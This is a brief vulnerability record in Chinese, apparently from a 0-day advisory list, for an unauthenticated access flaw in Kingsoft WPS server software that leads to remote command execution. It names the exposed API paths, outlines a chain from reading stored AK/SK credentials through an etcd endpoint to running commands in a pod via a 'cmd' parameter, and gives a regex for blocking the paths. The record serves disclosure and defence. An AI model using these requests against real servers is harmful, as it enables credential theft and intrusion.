vendor = "金山"
name = "WPS未授权访问导致RCE"
type = "RCE"
version = "未知"
path = "/open/v6/api/etcd/operate /open/api/etcd/operate /mgr/api/etcd/operate /mgr/api/mq/v1/receive/msg /open/api/tools/v1/collect/appactivity /mgr/api/tools/v1/collect/appactivity"
detail = "1.未授权访问 /open/v6/api/etcd/operate?key=/config/storage&method=get 2.获取AKSK后使用脚本添加kubelet 路由映射（需获取TOKEN） 3.向对应POD发起通信后实现RCE /open/wps/run/{namespace}/{podname}/node-exporter?cmd={url_encode_command}"
fix = "^/wps/(open|mgr)/api/(etcd/operate|mq/v1/receive/msg|tools/v1/collect/appactivity)$|^/wps/open/v6/api/etcd/operate$"
date = "0717"
label = "0day"
verifier = "AdySec"
